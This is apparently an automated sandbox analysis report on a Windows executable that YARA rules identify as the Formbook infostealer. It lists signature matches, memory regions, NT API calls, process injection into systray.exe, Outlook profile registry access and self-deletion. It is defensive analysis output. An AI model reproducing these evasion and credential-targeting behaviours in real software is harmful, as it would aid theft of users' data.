          Source: 3.2.535276_86376.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.535276_86376.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.535276_86376.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_024738800_2_02473880
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_024773020_2_02477302
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_04A859300_2_04A85930
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_04A83AA00_2_04A83AA0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_04A83AB00_2_04A83AB0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_04A83A570_2_04A83A57
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_04A81B440_2_04A81B44
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004058033_2_00405803
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004038833_2_00403883
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0042310A3_2_0042310A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004229EB3_2_004229EB
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004221F13_2_004221F1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_00401B603_2_00401B60
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004223DD3_2_004223DD
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004055DA3_2_004055DA
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004055E33_2_004055E3
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004225E63_2_004225E6
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004206433_2_00420643
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004226B73_2_004226B7
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_00422F713_2_00422F71
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0042170D3_2_0042170D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0042073E3_2_0042073E
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004017C03_2_004017C0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0040BFAE3_2_0040BFAE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0040BFB33_2_0040BFB3
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004017BF3_2_004017BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010AF9003_2_010AF900
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C41203_2_010C4120
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C99BF3_2_010C99BF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011610023_2_01161002
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0117E8243_2_0117E824
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA8303_2_010CA830
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BB0903_2_010BB090
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D20A03_2_010D20A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011720A83_2_011720A8
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011728EC3_2_011728EC
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CA3093_2_010CA309
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01172B283_2_01172B28
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010CAB403_2_010CAB40
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DEBB03_2_010DEBB0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116DBD23_2_0116DBD2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011603DA3_2_011603DA
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010DABD83_2_010DABD8
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011523E33_2_011523E3
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0115FA2B3_2_0115FA2B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011722AE3_2_011722AE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01164AEF3_2_01164AEF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01172D073_2_01172D07
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010A0D203_2_010A0D20
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01171D553_2_01171D55
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010D25813_2_010D2581
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011725DD3_2_011725DD
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010BD5E03_2_010BD5E0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010B841F3_2_010B841F
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116D4663_2_0116D466
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_011644963_2_01164496
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0117DFCE3_2_0117DFCE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01171FF13_2_01171FF1
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0116D6163_2_0116D616
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010C6E303_2_010C6E30
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_01172EF73_2_01172EF7
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: String function: 010AB150 appears 124 times
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041E563 NtCreateFile,3_2_0041E563
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041E613 NtReadFile,3_2_0041E613
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041E693 NtClose,3_2_0041E693
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041E743 NtAllocateVirtualMemory,3_2_0041E743
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041E65D NtReadFile,3_2_0041E65D
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041E68F NtClose,3_2_0041E68F
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_010E9910
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E99A0 NtCreateSection,LdrInitializeThunk,3_2_010E99A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9840 NtDelayExecution,LdrInitializeThunk,3_2_010E9840
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_010E9860
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_010E98F0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_010E9A00
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9A20 NtResumeThread,LdrInitializeThunk,3_2_010E9A20
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9A50 NtCreateFile,LdrInitializeThunk,3_2_010E9A50
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9540 NtReadFile,LdrInitializeThunk,3_2_010E9540
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E95D0 NtClose,LdrInitializeThunk,3_2_010E95D0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9710 NtQueryInformationToken,LdrInitializeThunk,3_2_010E9710
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9780 NtMapViewOfSection,LdrInitializeThunk,3_2_010E9780
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_010E97A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9FE0 NtCreateMutant,LdrInitializeThunk,3_2_010E9FE0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_010E9660
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_010E96E0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9950 NtQueueApcThread,3_2_010E9950
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E99D0 NtCreateProcessEx,3_2_010E99D0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9820 NtEnumerateKey,3_2_010E9820
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010EB040 NtSuspendThread,3_2_010EB040
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E98A0 NtWriteVirtualMemory,3_2_010E98A0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9B00 NtSetValueKey,3_2_010E9B00
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010EA3B0 NtGetContextThread,3_2_010EA3B0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9A10 NtQuerySection,3_2_010E9A10
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9A80 NtOpenDirectoryObject,3_2_010E9A80
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9520 NtWaitForSingleObject,3_2_010E9520
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010EAD30 NtSetContextThread,3_2_010EAD30
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9560 NtWriteFile,3_2_010E9560
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E95F0 NtQueryInformationFile,3_2_010E95F0
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010EA710 NtOpenProcessToken,3_2_010EA710
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9730 NtQueryVirtualMemory,3_2_010E9730
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9760 NtOpenProcess,3_2_010E9760
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9770 NtSetInformationFile,3_2_010E9770
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010EA770 NtOpenThread,3_2_010EA770
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9610 NtEnumerateValueKey,3_2_010E9610
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9650 NtQueryValueKey,3_2_010E9650
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E9670 NtQueryInformationProcess,3_2_010E9670
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010E96D0 NtCreateKey,3_2_010E96D0
          Source: 535276_86376.exe, 00000000.00000002.428523548.0000000006DD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRegive.dll4 vs 535276_86376.exe
          Source: 535276_86376.exe, 00000000.00000000.386649816.0000000000180000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerHJD.exeF vs 535276_86376.exe
          Source: 535276_86376.exe, 00000000.00000002.412124399.00000000007F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 535276_86376.exe
          Source: 535276_86376.exe, 00000003.00000002.454801254.000000000119F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 535276_86376.exe
          Source: 535276_86376.exe, 00000003.00000003.410209844.0000000000E5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 535276_86376.exe
          Source: 535276_86376.exe, 00000003.00000002.454471972.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs 535276_86376.exe
          Source: 535276_86376.exe, 00000003.00000002.454773362.0000000001023000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs 535276_86376.exe
          Source: 535276_86376.exe, 00000003.00000003.413985975.0000000001003000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 535276_86376.exe
          Source: 535276_86376.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 535276_86376.exeReversingLabs: Detection: 16%
          Source: 535276_86376.exeVirustotal: Detection: 32%
          Source: 535276_86376.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\535276_86376.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exe
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exe
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exe
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exeJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exeJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess created: C:\Users\user\Desktop\535276_86376.exe C:\Users\user\Desktop\535276_86376.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\535276_86376.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile created: C:\Users\user\AppData\Local\Temp\-15B7L5MNMJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@10/7
          Source: 535276_86376.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\535276_86376.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: 535276_86376.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 535276_86376.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: 535276_86376.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000006.00000000.446131411.00007FFA13021000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000006.00000000.446131411.00007FFA13021000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: systray.pdb source: 535276_86376.exe, 00000003.00000002.454773362.0000000001020000.00000040.10000000.00040000.00000000.sdmp, 535276_86376.exe, 00000003.00000002.454471972.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: 535276_86376.exe, 00000003.00000002.454773362.0000000001020000.00000040.10000000.00040000.00000000.sdmp, 535276_86376.exe, 00000003.00000002.454471972.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 535276_86376.exe, 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, 535276_86376.exe, 00000003.00000003.410209844.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000003.00000003.413985975.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000003.454471268.00000000048BA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 535276_86376.exe, 535276_86376.exe, 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, 535276_86376.exe, 00000003.00000003.410209844.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000003.00000003.413985975.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000003.454471268.00000000048BA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rHJD.pdb source: 535276_86376.exe, 00000000.00000000.386434838.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000006.00000002.668081280.00000000151E3000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000006.00000000.446131411.00007FFA13021000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: rHJD.pdbSHA256 source: 535276_86376.exe, 00000000.00000000.386434838.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000006.00000002.668081280.00000000151E3000.00000004.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_04A81560 pushad ; ret 0_2_04A81561
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 0_2_04A8178C push esp; retf 0_2_04A81791
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041085A push ds; ret 3_2_0041085B
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041A8A6 push edi; retf 3_2_0041A8AC
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041B316 push edx; iretd 3_2_0041B320
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041BCF6 push ss; iretd 3_2_0041BCFE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041B482 pushad ; retf 3_2_0041B48C
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_0041AD04 push esi; iretd 3_2_0041AD0A
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_00422DFE push ebp; retf 0000h3_2_00422E06
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_00401DB0 push eax; ret 3_2_00401DB2
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_00405EEF push ds; ret 3_2_00405EFF
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_00410756 pushad ; retf 3_2_00410757
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_004117F6 push ss; ret 3_2_004117FE
          Source: C:\Users\user\Desktop\535276_86376.exeCode function: 3_2_010FD0D1 push ecx; ret 3_2_010FD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.75074663112432

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\systray.exeFile deleted: c:\users\user\desktop\535276_86376.exeJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
